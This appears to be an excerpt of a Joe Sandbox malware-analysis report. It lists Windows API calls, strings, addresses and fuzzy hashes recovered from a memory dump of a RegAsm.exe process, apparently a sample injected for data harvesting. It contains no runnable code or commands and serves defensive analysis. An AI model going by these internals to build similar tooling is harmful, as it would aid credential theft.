                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$memcpy$ErrorLast
                                                          • String ID: 6$\
                                                          • API String ID: 404372293-1284684873
                                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                          • GetLastError.KERNEL32 ref: 0041855C
                                                          • Sleep.KERNEL32(00000064), ref: 00418571
                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                          • GetLastError.KERNEL32 ref: 0041858E
                                                          • Sleep.KERNEL32(00000064), ref: 004185A3
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AttributesErrorFileLastSleep$??3@
                                                          • String ID:
                                                          • API String ID: 1040972850-0
                                                          • Opcode ID: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                          • Opcode Fuzzy Hash: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                          APIs
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                          • wcscpy.MSVCRT ref: 0040A107
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                          • String ID:
                                                          • API String ID: 1331804452-0
                                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                          APIs
                                                          Strings
                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                          • <%s>, xrefs: 004100A6
                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$_snwprintf
                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                          • API String ID: 3473751417-2880344631
                                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscat$_snwprintfmemset
                                                          • String ID: %2.2X
                                                          • API String ID: 2521778956-791839006
                                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _snwprintfwcscpy
                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                          • API String ID: 999028693-502967061
                                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                          APIs
                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                            • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                          • memset.MSVCRT ref: 0040C439
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                          • memset.MSVCRT ref: 0040C4D0
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                          • String ID:
                                                          • API String ID: 1973883786-0
                                                          • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                          • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                          APIs
                                                          • memset.MSVCRT ref: 004116FF
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                          • API String ID: 2618321458-3614832568
                                                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                          APIs
                                                          • memset.MSVCRT ref: 004185FC
                                                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@AttributesFilememset
                                                          • String ID:
                                                          • API String ID: 776155459-0
                                                          • Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                          • Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                          APIs
                                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                          • malloc.MSVCRT ref: 00417524
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                          • String ID:
                                                          • API String ID: 2308052813-0
                                                          • Opcode ID: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                          • Opcode Fuzzy Hash: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                          APIs
                                                          • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                          • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PathTemp$??3@
                                                          • String ID: %s\etilqs_$etilqs_
                                                          • API String ID: 1589464350-1420421710
                                                          • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                          • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastMessage_snwprintf
                                                          • String ID: Error$Error %d: %s
                                                          • API String ID: 313946961-1552265934
                                                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                          APIs
                                                          Strings
                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                          • API String ID: 3510742995-272990098
                                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpymemset
                                                          • String ID: gj
                                                          • API String ID: 1297977491-4203073231
                                                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                          APIs
                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                          • malloc.MSVCRT ref: 004174BD
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                          • String ID:
                                                          • API String ID: 2903831945-0
                                                          • Opcode ID: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                          • Opcode Fuzzy Hash: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                          APIs
                                                          • GetParent.USER32(?), ref: 0040D453
                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Window$Rect$ClientParentPoints
                                                          • String ID:
                                                          • API String ID: 4247780290-0
                                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                          APIs
                                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                          • memset.MSVCRT ref: 004450CD
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                          • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                          • String ID:
                                                          • API String ID: 1471605966-0
                                                          • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                          • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                          APIs
                                                          • wcscpy.MSVCRT ref: 0044475F
                                                          • wcscat.MSVCRT ref: 0044476E
                                                          • wcscat.MSVCRT ref: 0044477F
                                                          • wcscat.MSVCRT ref: 0044478E
                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                          • String ID: \StringFileInfo\
                                                          • API String ID: 102104167-2245444037
                                                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$??3@
                                                          • String ID: g4@
                                                          • API String ID: 3314356048-2133833424
                                                          • Opcode ID: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                          • Opcode Fuzzy Hash: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                          APIs
                                                          • memset.MSVCRT ref: 004100FB
                                                          • memset.MSVCRT ref: 00410112
                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                          • _snwprintf.MSVCRT ref: 00410141
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                          • String ID: </%s>
                                                          • API String ID: 3400436232-259020660
                                                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                          APIs
                                                          • memset.MSVCRT ref: 0040D58D
                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                          • String ID: caption
                                                          • API String ID: 1523050162-4135340389
                                                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                          APIs
                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                          • String ID: MS Sans Serif
                                                          • API String ID: 210187428-168460110
                                                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                          APIs
                                                          • memset.MSVCRT ref: 0040560C
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
